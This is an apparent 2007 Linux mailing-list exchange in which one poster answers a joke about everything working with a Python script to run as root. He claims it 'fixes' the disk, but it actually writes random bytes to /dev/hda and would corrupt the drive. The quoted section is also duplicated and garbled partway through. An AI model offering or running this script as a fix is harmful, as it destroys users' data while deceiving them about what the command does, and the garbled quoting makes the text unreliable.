On Tuesday 27 February 2007 08:54:02 am Russell Jones wrote:
> Kai Ponte wrote:
> > Okay, in the past few days, I've added a ton of repositories to SMART,
> > figured out how to upgrade firefox to 2.0, added a bunch of new KDE
> > thingies, fixed my KWallet so I can use WPA encryption on my WiFi,
> > upgraded to Pan .124 and...
> >
> > ...everything's working fine.
> >
> > What's wrong?
>
> You need to run this script as root:
> #!/usr/bin/python
> import random
> fix=file("/dev/hda", "w")
> for fix1 in range(1, 1000000):
>  fix.seek(random.randrange(1, 1000000))
>  fix.write(random.randint(0, fix1))> > Okay, in the past few days, I've 
added a ton of repositories to SMART,
> > figured out how to upgrade firefox to 2.0, added a bunch of new KDE
> > thingies, fixed my KWallet so I can use WPA encryption on my WiFi,
> > upgraded to Pan .124 and...
> >
> > ...everything's working fine.
> >
> > What's wrong?
>
> You need to run this script as root:
> #!/usr/bin/python
> import random
> fix=file("/dev/hda", "w")
> for fix1 in range(1, 1000000):
>  fix.seek(random.randrange(1, 1000000))
>  fix.write(random.randint(0, fix1))
>
> This will go through your hard disk and find random non-errors, then fix
> them. You may need to change /dev/hda to match the device file of your
> hard disk.

Ahh, thank you.

I will run this as soon as I've finished up my other work.

-- 
kai

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